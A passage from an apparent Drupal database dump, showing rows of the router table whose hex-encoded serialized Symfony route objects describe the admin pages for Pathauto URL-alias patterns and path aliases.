732f616464223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.pathauto_pattern.collection', '/admin/config/search/path/patterns', '/admin/config/search/path/patterns', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a31363a22706174686175746f5f7061747465726e223b733a363a225f7469746c65223b733a383a225061747465726e73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a2261646d696e697374657220706174686175746f223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34313a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.pathauto_pattern.config_translation_overview', '/admin/config/search/path/patterns/{pathauto_pattern}/translate', '/admin/config/search/path/patterns/%/translate', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36333a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31363a22706174686175746f5f7061747465726e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22706174686175746f5f7061747465726e223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a706174686175746f5f7061747465726e223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38303a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f283f503c706174686175746f5f7061747465726e3e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22706174686175746f5f7061747465726e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f252f7472616e736c617465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.pathauto_pattern.delete_form', '/admin/config/search/path/patterns/{pathauto_pattern}/delete', '/admin/config/search/path/patterns/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36303a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32333a22706174686175746f5f7061747465726e2e64656c657465223b733a31353a225f7469746c655f63616c6c6261636b223b733a36303a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a64656c6574655469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32333a22706174686175746f5f7061747465726e2e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22706174686175746f5f7061747465726e223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a706174686175746f5f7061747465726e223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37373a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f283f503c706174686175746f5f7061747465726e3e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22706174686175746f5f7061747465726e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34333a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.pathauto_pattern.disable', '/admin/config/search/path/patterns/{pathauto_pattern}/disable', '/admin/config/search/path/patterns/%/disable', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36313a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f64697361626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31323a225f656e746974795f666f726d223b733a32343a22706174686175746f5f7061747465726e2e64697361626c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32333a22706174686175746f5f7061747465726e2e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31363a22706174686175746f5f7061747465726e223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a706174686175746f5f7061747465726e223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37383a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f283f503c706174686175746f5f7061747465726e3e5b5e2f5d2b2b292f64697361626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f64697361626c65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22706174686175746f5f7061747465726e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f252f64697361626c65223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.pathauto_pattern.duplicate_form', '/admin/config/search/path/patterns/{pathauto_pattern}/duplicate', '/admin/config/search/path/patterns/%/duplicate', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36333a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f6475706c6963617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31323a225f656e746974795f666f726d223b733a32363a22706174686175746f5f7061747465726e2e6475706c6963617465223b733a363a225f7469746c65223b733a32363a224475706c696361746520506174686175746f207061747465726e223b733a31323a2274656d7073746f72655f6964223b733a31363a22706174686175746f2e7061747465726e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a2261646d696e697374657220706174686175746f223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31363a22706174686175746f5f7061747465726e223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a706174686175746f5f7061747465726e223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38303a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f283f503c706174686175746f5f7061747465726e3e5b5e2f5d2b2b292f6475706c6963617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f6475706c6963617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22706174686175746f5f7061747465726e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f252f6475706c6963617465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.pathauto_pattern.edit_form', '/admin/config/search/path/patterns/{pathauto_pattern}', '/admin/config/search/path/patterns/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32343a22706174686175746f5f7061747465726e2e64656661756c74223b733a31353a225f7469746c655f63616c6c6261636b223b733a35383a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a656469745469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32333a22706174686175746f5f7061747465726e2e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22706174686175746f5f7061747465726e223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a706174686175746f5f7061747465726e223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37303a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f283f503c706174686175746f5f7061747465726e3e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22706174686175746f5f7061747465726e223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a33363a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.pathauto_pattern.enable', '/admin/config/search/path/patterns/{pathauto_pattern}/enable', '/admin/config/search/path/patterns/%/enable', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36303a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f656e61626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31323a225f656e746974795f666f726d223b733a32333a22706174686175746f5f7061747465726e2e656e61626c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32333a22706174686175746f5f7061747465726e2e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31363a22706174686175746f5f7061747465726e223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a706174686175746f5f7061747465726e223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37373a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f283f503c706174686175746f5f7061747465726e3e5b5e2f5d2b2b292f656e61626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f656e61626c65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22706174686175746f5f7061747465726e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22706174686175746f5f7061747465726e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34333a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f252f656e61626c65223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.path_alias.add_form', '/admin/config/search/path/add', '/admin/config/search/path/add', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f636f6e6669672f7365617263682f706174682f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31323a225f656e746974795f666f726d223b733a31383a22706174685f616c6961732e64656661756c74223b733a31343a22656e746974795f747970655f6964223b733a31303a22706174685f616c696173223b733a31353a225f7469746c655f63616c6c6261636b223b733a35363a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a6164645469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f656e746974795f6372656174655f616363657373223b733a31303a22706174685f616c696173223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e656e746974795f637265617465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f636f6e6669672f7365617263682f706174682f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f636f6e6669672f7365617263682f706174682f616464223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.path_alias.collection', '/admin/config/search/path', '/admin/config/search/path', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f61646d696e2f636f6e6669672f7365617263682f70617468223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f6c697374223b733a31303a22706174685f616c696173223b733a363a225f7469746c65223b733a31313a2255524c20616c6961736573223b733a31363a225f7469746c655f617267756d656e7473223b613a303a7b7d733a31343a225f7469746c655f636f6e74657874223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e69737465722075726c20616c6961736573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33323a227b5e2f61646d696e2f636f6e6669672f7365617263682f70617468247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f61646d696e2f636f6e6669672f7365617263682f70617468223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32353a222f61646d696e2f636f6e6669672f7365617263682f70617468223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.path_alias.delete_form', '/admin/config/search/path/delete/{path_alias}', '/admin/config/search/path/delete/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34353a222f61646d696e2f636f6e6669672f7365617263682f706174682f64656c6574652f7b706174685f616c6961737d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31373a22706174685f616c6961732e64656c657465223b733a31353a225f7469746c655f63616c6c6261636b223b733a36303a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a64656c6574655469746c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31373a22706174685f616c6961732e64656c657465223b733a31303a22706174685f616c696173223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a22706174685f616c696173223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a706174685f616c696173223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a22706174685f616c696173223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35393a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f64656c6574652f283f503c706174685f616c6961733e5c642b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a31303a22706174685f616c696173223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f636f6e6669672f7365617263682f706174682f64656c657465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a22706174685f616c696173223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f64656c6574652f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.path_alias.edit_form', '/admin/config/search/path/edit/{path_alias}', '/admin/config/search/path/edit/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34333a222f61646d696e2f636f6e6669672f7365617263682f706174682f656469742f7b706174685f616c6961737d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31383a22706174685f616c6961732e64656661756c74223b733a31353a225f7469746c655f63616c6c6261636b223b733a35383a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a656469745469746c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31373a22706174685f616c6961732e757064617465223b733a31303a22706174685f616c696173223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a22706174685f616c696173223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a706174685f616c696173223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a2